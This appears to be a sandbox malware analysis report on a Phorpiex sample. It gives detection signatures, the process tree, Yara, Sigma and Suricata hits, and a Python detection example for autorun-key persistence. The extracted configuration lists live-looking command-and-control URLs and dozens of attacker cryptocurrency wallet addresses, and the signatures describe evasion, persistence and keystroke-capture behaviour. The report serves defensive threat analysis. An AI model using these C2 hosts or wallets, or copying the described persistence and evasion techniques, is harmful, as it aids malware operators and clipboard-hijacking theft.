
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1512821
MD5: ababca6d12d96e8dd2f1d7114b406fae
SHA1: dcd9798e83ec688aacb3de8911492a232cb41a32
SHA256: a992920e64a64763f3dd8c2a431a0f5e56e5b3782a1496de92bc80ee71cca5ba
Tags: exe, Phorpiex

Detection

Phorpiex
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Phorpiex
AI detected suspicious sample
Changes security center settings (notifications, updates, antivirus, firewall)
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Abnormal high CPU Usage
Connects to several IPs in different countries
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • file.exe (PID: 6672 cmdline: "C:\Users\user\Desktop\file.exe" MD5: ABABCA6D12D96E8DD2F1D7114B406FAE)
    • sysmablsvr.exe (PID: 6768 cmdline: C:\Windows\sysmablsvr.exe MD5: ABABCA6D12D96E8DD2F1D7114B406FAE)
      • 158752420.exe (PID: 3384 cmdline: C:\Users\user\AppData\Local\Temp\158752420.exe MD5: 8242045FF6B7BED00C8A94C77193F2DE)
      • 524024912.exe (PID: 332 cmdline: C:\Users\user\AppData\Local\Temp\524024912.exe MD5: AC0A159A6C219E2CEA55DCC77AB6E337)
      • 259428477.exe (PID: 504 cmdline: C:\Users\user\AppData\Local\Temp\259428477.exe MD5: 8242045FF6B7BED00C8A94C77193F2DE)
      • 2958729589.exe (PID: 1260 cmdline: C:\Users\user\AppData\Local\Temp\2958729589.exe MD5: 8242045FF6B7BED00C8A94C77193F2DE)
  • sysmablsvr.exe (PID: 2148 cmdline: "C:\Windows\sysmablsvr.exe" MD5: ABABCA6D12D96E8DD2F1D7114B406FAE)
  • cleanup

Malware Configuration

Phorpiex: {"C2 url": ["http://185.215.113.66/", "http://77.91.77.92/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "17hgMFyLDwMjxWqw5GhijhnPdJDyFDqecY", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "bnb1epx67ne4vckqmaj4gwke8m322f4yjr6eh52wqw", "band1f05d98dvehkecw6ex3yd4pxqssw3uemx09sg2n", "bc1qmpkehfffkr6phuklsksnd7nhgx0369sxu772m3", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Ge7amzjabAHdubjUYS2Cw84hNScLVRHmHg", "EQDYiebztC06Lpo9y1-m-g_bOsJ2KN3I-1mOgllNNIlIPZLi", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA"]}
Yara Overview

Sample
Source | Rule | Description | Author | Strings
file.exe | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |

Dropped Files
Source | Rule | Description | Author | Strings
C:\Windows\sysmablsvr.exe | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |

Memory Dumps
Source | Rule | Description | Author | Strings
00000001.00000000.1804968685.0000000000410000.00000002.00000001.01000000.00000004.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
00000000.00000000.1784055994.0000000000410000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
00000002.00000000.1909749196.0000000000410000.00000002.00000001.01000000.00000004.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
(5 further memory-dump entries not shown)

Unpacked PEs
Source | Rule | Description | Author | Strings
2.0.sysmablsvr.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
1.2.sysmablsvr.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
0.2.file.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
2.2.sysmablsvr.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
0.0.file.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
(1 further unpacked-PE entry not shown)
Sigma Overview

Rule: Wow6432Node CurrentVersion Autorun Keys Modification
Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data: Details: C:\Windows\sysmablsvr.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 6672, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings
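The Sigma hit above can be re-checked against the raw Sysmon record it was raised on. The following is an added example, not code from the Sigma rule or from Joe Sandbox: it applies the core logic of a Wow6432Node autorun-key rule (Sysmon Event ID 13, SetValue, TargetObject under HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run or RunOnce; the published rule covers more ASEP keys than these two) to the event fields quoted in the report, then adds two triage checks of this example's own: whether the registered binary sits directly in C:\Windows, and whether the value was written by a different binary than the one it registers (here file.exe registering sysmablsvr.exe). The event dict is constructed from the fields shown above.

```python
"""Re-check of a Sysmon registry SetValue event against Wow6432Node autorun logic.

Added example for this report; not the Sigma rule's or Joe Sandbox's code.
"""
import ntpath
import re

# Event fields copied from the report's Sigma entry (constructed dict).
EVENT = {
    "EventID": 13,
    "EventType": "SetValue",
    "Image": r"C:\Users\user\Desktop\file.exe",
    "ProcessId": 6672,
    "TargetObject": r"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings",
    "Details": r"C:\Windows\sysmablsvr.exe",
}

# Only Run and RunOnce under the WOW6432Node view (narrower than the real rule);
# case-insensitive, like the registry itself.
AUTORUN_RE = re.compile(
    r"\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\",
    re.IGNORECASE,
)

# <drive>:\Windows\<file> with no further subdirectory: a file dropped straight
# into the Windows root, which legitimate installers almost never do.
WINDOWS_ROOT_RE = re.compile(r"^[A-Za-z]:\\Windows\\[^\\]+$", re.IGNORECASE)


def is_wow6432_autorun_set(event: dict) -> bool:
    """Sigma-style match: Sysmon ID 13 SetValue on a WOW6432Node Run/RunOnce key."""
    if event.get("EventID") != 13 or event.get("EventType") != "SetValue":
        return False
    return AUTORUN_RE.search(event.get("TargetObject", "")) is not None


def first_path_token(details: str) -> str:
    """Return the executable path from a Run value, dropping quotes and arguments."""
    details = details.strip()
    if details.startswith('"'):
        return details[1:].split('"', 1)[0]
    # Unquoted value: cut after the first .exe token.
    m = re.match(r"(.+?\.exe)(\s|$)", details, re.IGNORECASE)
    return m.group(1) if m else details


def triage(event: dict) -> dict:
    """Analyst context for a matched event: value name, target binary, two risk flags."""
    target = first_path_token(event["Details"])
    writer = ntpath.basename(event["Image"]).lower()   # ntpath: Windows paths on any host
    return {
        "value_name": event["TargetObject"].rsplit("\\", 1)[-1],
        "target": target,
        "in_windows_root": WINDOWS_ROOT_RE.match(target) is not None,
        "registered_by_other_binary": writer != ntpath.basename(target).lower(),
    }


if __name__ == "__main__":
    if is_wow6432_autorun_set(EVENT):
        print("autorun persistence:", triage(EVENT))
```

Both extra flags fire on this record: the Run value "Windows Settings" points at C:\Windows\sysmablsvr.exe, and it was written by file.exe rather than by sysmablsvr.exe itself, which matches the process tree (file.exe drops and starts the copy) and the "Drops PE files to the windows directory" signature.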
Suricata Overview

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-17T23:09:18.095591+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 84.54.122.14 | 40500 | UDP
2024-09-17T23:09:23.161855+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 178.151.4.209 | 40500 | UDP
2024-09-17T23:09:33.235648+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 2.189.25.176 | 40500 | UDP
2024-09-17T23:09:38.241849+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 86.102.56.226 | 40500 | UDP
2024-09-17T23:09:43.241812+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 2.190.124.23 | 40500 | UDP
2024-09-17T23:09:58.255064+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 105.106.52.97 | 40500 | UDP
2024-09-17T23:10:03.308803+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 217.30.170.10 | 40500 | UDP
2024-09-17T23:10:08.302854+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 217.30.162.37 | 40500 | UDP
2024-09-17T23:10:13.319220+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 81.195.238.130 | 40500 | UDP
2024-09-17T23:10:23.335541+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 46.100.121.146 | 40500 | UDP
2024-09-17T23:10:28.348342+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 37.255.23.100 | 40500 | UDP
2024-09-17T23:10:38.364094+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 178.253.109.195 | 40500 | UDP
2024-09-17T23:10:43.380318+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 5.236.253.124 | 40500 | UDP
2024-09-17T23:10:48.397244+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 213.230.127.213 | 40500 | UDP
2024-09-17T23:10:58.514941+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 89.43.145.18 | 40500 | UDP
2024-09-17T23:11:03.520358+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 79.165.23.131 | 40500 | UDP
2024-09-17T23:11:13.541304+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 151.240.79.133 | 40500 | UDP
2024-09-17T23:11:23.570592+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 178.88.111.20 | 40500 | UDP
2024-09-17T23:12:18.707808+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 2.185.144.157 | 40500 | UDP
2024-09-17T23:12:23.724097+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 78.39.225.27 | 40500 | UDP
2024-09-17T23:12:28.739574+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 37.228.65.185 | 40500 | UDP
2024-09-17T23:12:38.848779+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 149.54.47.90 | 40500 | UDP
2024-09-17T23:12:53.879963+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 188.215.175.89 | 40500 | UDP
2024-09-17T23:12:58.897691+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 100.109.48.43 | 40500 | UDP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-17T23:09:16.259431+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49730 | 185.215.113.66 | 80 | TCP
2024-09-17T23:09:17.984779+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49732 | 185.215.113.66 | 80 | TCP
2024-09-17T23:09:23.386341+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
2024-09-17T23:09:25.665035+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
2024-09-17T23:09:27.916077+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
2024-09-17T23:09:30.163885+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
2024-09-17T23:09:32.414765+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
2024-09-17T23:09:37.130578+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49738 | 77.91.77.92 | 80 | TCP
2024-09-17T23:09:40.900663+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49741 | 77.91.77.92 | 80 | TCP
2024-09-17T23:09:44.587314+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49743 | 77.91.77.92 | 80 | TCP
2024-09-17T23:09:48.275269+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49744 | 77.91.77.92 | 80 | TCP
2024-09-17T23:09:52.012408+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49745 | 77.91.77.92 | 80 | TCP
2024-09-17T23:09:55.742140+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49746 | 77.91.77.92 | 80 | TCP
2024-09-17T23:09:59.523347+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49748 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:01.236543+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49749 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:07.663501+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49749 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:10.219426+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49751 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:16.643936+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49752 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:16.846309+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49751 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:19.905577+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49751 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:22.671072+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49754 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:25.439810+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49756 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:29.317891+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49758 | 185.215.113.66 | 80 | TCP
2024-09-17T23:10:31.032415+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49759 | 185.215.113.66 | 80 | TCP
2024-09-17T23:10:37.676890+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49762 | 185.215.113.66 | 80 | TCP
2024-09-17T23:10:40.456563+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49764 | 185.215.113.66 | 80 | TCP
2024-09-17T23:10:43.194117+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49766 | 185.215.113.66 | 80 | TCP
2024-09-17T23:10:46.044400+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49767 | 185.215.113.66 | 80 | TCP
2024-09-17T23:10:48.784910+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49769 | 185.215.113.66 | 80 | TCP
2024-09-17T23:10:53.491643+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49770 | 77.91.77.92 | 80 | TCP
2024-09-17T23:10:57.334445+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49772 | 77.91.77.92 | 80 | TCP
2024-09-17T23:11:01.041077+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49774 | 77.91.77.92 | 80 | TCP
2024-09-17T23:11:04.737217+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49776 | 77.91.77.92 | 80 | TCP
2024-09-17T23:11:08.444057+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49777 | 77.91.77.92 | 80 | TCP
2024-09-17T23:11:12.115917+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49779 | 77.91.77.92 | 80 | TCP
2024-09-17T23:11:16.142994+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49781 | 91.202.233.141 | 80 | TCP
2024-09-17T23:11:17.859805+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49782 | 91.202.233.141 | 80 | TCP
2024-09-17T23:11:24.665171+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49785 | 91.202.233.141 | 80 | TCP
2024-09-17T23:11:27.404856+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49786 | 91.202.233.141 | 80 | TCP
2024-09-17T23:11:30.236762+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49788 | 91.202.233.141 | 80 | TCP
2024-09-17T23:11:33.050771+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49789 | 91.202.233.141 | 80 | TCP
2024-09-17T23:11:35.900980+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49791 | 91.202.233.141 | 80 | TCP
2024-09-17T23:11:39.986361+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49793 | 185.215.113.66 | 80 | TCP
2024-09-17T23:11:41.832654+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49794 | 185.215.113.66 | 80 | TCP
2024-09-17T23:11:47.503983+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49797 | 185.215.113.66 | 80 | TCP
2024-09-17T23:11:50.288976+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49799 | 185.215.113.66 | 80 | TCP
2024-09-17T23:11:53.080321+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49800 | 185.215.113.66 | 80 | TCP
2024-09-17T23:11:55.821523+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49802 | 185.215.113.66 | 80 | TCP
2024-09-17T23:11:58.781922+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49803 | 185.215.113.66 | 80 | TCP
2024-09-17T23:12:03.475094+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49805 | 77.91.77.92 | 80 | TCP
2024-09-17T23:12:07.188452+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49807 | 77.91.77.92 | 80 | TCP
2024-09-17T23:12:10.900881+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49809 | 77.91.77.92 | 80 | TCP
2024-09-17T23:12:14.779580+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49810 | 77.91.77.92 | 80 | TCP
2024-09-17T23:12:18.495368+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49812 | 77.91.77.92 | 80 | TCP
2024-09-17T23:12:22.405916+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49814 | 77.91.77.92 | 80 | TCP
2024-09-17T23:12:26.510035+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49816 | 91.202.233.141 | 80 | TCP
2024-09-17T23:12:28.823664+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49817 | 91.202.233.141 | 80 | TCP
2024-09-17T23:12:35.986822+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49820 | 91.202.233.141 | 80 | TCP
2024-09-17T23:12:38.729098+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49821 | 91.202.233.141 | 80 | TCP
2024-09-17T23:12:41.467262+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49823 | 91.202.233.141 | 80 | TCP
2024-09-17T23:12:44.777939+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49825 | 91.202.233.141 | 80 | TCP
2024-09-17T23:12:47.533845+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49826 | 91.202.233.141 | 80 | TCP
2024-09-17T23:12:51.407501+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49828 | 185.215.113.66 | 80 | TCP
2024-09-17T23:12:54.150335+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49829 | 185.215.113.66 | 80 | TCP
2024-09-17T23:12:56.871465+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49831 | 185.215.113.66 | 80 | TCP
2024-09-17T23:12:59.607090+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49832 | 185.215.113.66 | 80 | TCP
2024-09-17T23:13:02.354191+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49834 | 185.215.113.66 | 80 | TCP
2024-09-17T23:13:05.072325+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49836 | 185.215.113.66 | 80 | TCP
2024-09-17T23:13:09.923770+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49837 | 77.91.77.92 | 80 | TCP
2024-09-17T23:13:13.779440+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49839 | 77.91.77.92 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-17T23:09:15.563777+0200 | 2837677 | 1 | A Network Trojan was detected | 185.215.113.66 | 80 | 192.168.2.4 | 49793 | TCP
2024-09-17T23:11:43.982652+0200 | 2837677 | 1 | A Network Trojan was detected | 185.215.113.66 | 80 | 192.168.2.4 | 49794 | TCP
2024-09-17T23:11:46.807316+0200 | 2837677 | 1 | A Network Trojan was detected | 185.215.113.66 | 80 | 192.168.2.4 | 49796 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-17T23:09:16.259431+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 185.215.113.66 | 80 | TCP
2024-09-17T23:09:17.984779+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 185.215.113.66 | 80 | TCP
2024-09-17T23:09:23.386341+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
2024-09-17T23:09:25.665035+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
2024-09-17T23:09:27.916077+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
2024-09-17T23:09:30.163885+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
2024-09-17T23:09:32.414765+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
2024-09-17T23:09:37.130578+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 77.91.77.92 | 80 | TCP
2024-09-17T23:09:40.900663+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 77.91.77.92 | 80 | TCP
2024-09-17T23:09:44.587314+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 77.91.77.92 | 80 | TCP
2024-09-17T23:09:48.275269+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 77.91.77.92 | 80 | TCP
2024-09-17T23:09:52.012408+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 77.91.77.92 | 80 | TCP
2024-09-17T23:09:55.742140+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 77.91.77.92 | 80 | TCP
2024-09-17T23:09:59.523347+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:01.236543+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:07.663501+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:10.219426+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49751 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:16.846309+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49751 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:19.905577+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49751 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:22.671072+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49754 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:25.439810+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:29.317891+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49758 | 185.215.113.66 | 80 | TCP
2024-09-17T23:10:31.032415+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49759 | 185.215.113.66 | 80 | TCP
